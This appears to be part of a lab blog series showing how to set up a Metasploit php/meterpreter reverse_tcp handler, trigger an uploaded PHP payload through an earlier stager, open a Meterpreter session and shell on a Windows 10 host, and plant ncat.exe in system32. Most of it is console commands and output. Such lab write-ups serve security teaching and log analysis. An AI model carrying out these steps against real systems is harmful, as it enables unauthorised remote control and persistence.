msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.0.0.107 yes The listen address (an interface may be specified) LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
Start the listening process by executing "exploit"
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.107:4443
Verify the port is listening on our local system.
kali@securtynik:~$ sudo ss --numeric --listening --tcp --process sudo: unable to resolve host securtynik: Temporary failure in name resolution State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 256 10.0.0.107:4443 0.0.0.0:* users:(("ruby",pid=3354,fd=9))
Looks like we are good to go.
Now that it seems we have our attacking environment setup, let's now revisit our stager which was uploaded earlier when we got the "os-shell". The stager is hosted at "http://10.0.0.108:80/tmpuevkq.php" as we see earlier.
If we now open our browser and paste that URL, we see:
I then clicked browse and selected my "server.php" script.
Then uploaded the script
Now let's execute our script.
At this point, if we now transition to our "msfconsole", we see
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.0.107:4443 [*] Sending stage (38288 bytes) to 10.0.0.108 [*] Meterpreter session 1 opened (10.0.0.107:4443 -> 10.0.0.108:6375) at 2020-06-24 17:03:23 -0400 meterpreter >
Looks like we successfully got the session. Execute "sysinfo"
meterpreter > sysinfo Computer : SECURITYNIK-WIN OS : Windows NT SECURITYNIK-WIN 10.0 build 16299 (Windows 10) i586 Meterpreter : php/windows
At this point, we can now upload additional tools. Here I upload ncat.exe
meterpreter > upload ncat.exe c:\\windows\\system32\\ [*] uploading : ncat.exe -> c:\windows\system32\ [*] uploaded : ncat.exe -> c:\windows\system32\\ncat.exe
Before we go, let's grab a shell.
meterpreter > shell Process 3864 created. Channel 6 created. Microsoft Windows [Version 10.0.16299.125] (c) 2017 Microsoft Corporation. All rights reserved. C:\Windows\System32>
I leave it to your imagination, what you do from here on. I will close off this post and see you in the log analysis post.
Posts in this series:
References:
